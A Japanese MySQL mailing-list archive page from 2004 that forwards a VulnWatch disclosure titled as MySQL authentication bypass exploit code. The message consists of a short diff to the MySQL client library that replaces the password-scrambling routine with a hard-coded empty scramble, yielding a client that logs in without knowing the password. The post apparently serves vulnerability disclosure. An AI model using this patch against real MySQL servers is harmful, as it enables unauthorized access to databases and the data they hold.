[前][次][番号順一覧][スレッド一覧]

mysql:9802

From: Toshiboumi bugbird Ohta <Toshiboumi bugbird Ohta <bugbird@xxxxxxxxxx>>
Date: Fri, 9 Jul 2004 10:33:12 +0900
Subject: [mysql 09802] Fw: [VulnWatch] MySQL authentication bypass exploit code.

1941,1956c1941,1942
<   if (passwd[0])
<   {
<     if (mysql->server_capabilities & CLIENT_SECURE_CONNECTION)
<     {
<       *end++= SCRAMBLE_LENGTH;
<       scramble(end, mysql->scramble, passwd);
<       end+= SCRAMBLE_LENGTH;
<     }
<     else
<     {
<       scramble_323(end, mysql->scramble, passwd);
<       end+= SCRAMBLE_LENGTH_323 + 1;
<     }
<   }
<   else
<     *end++= '\0';                               /* empty password */
---
>   sprintf(end,"\x14\x00");
>   end+=2;

[前][次][番号順一覧][スレッド一覧]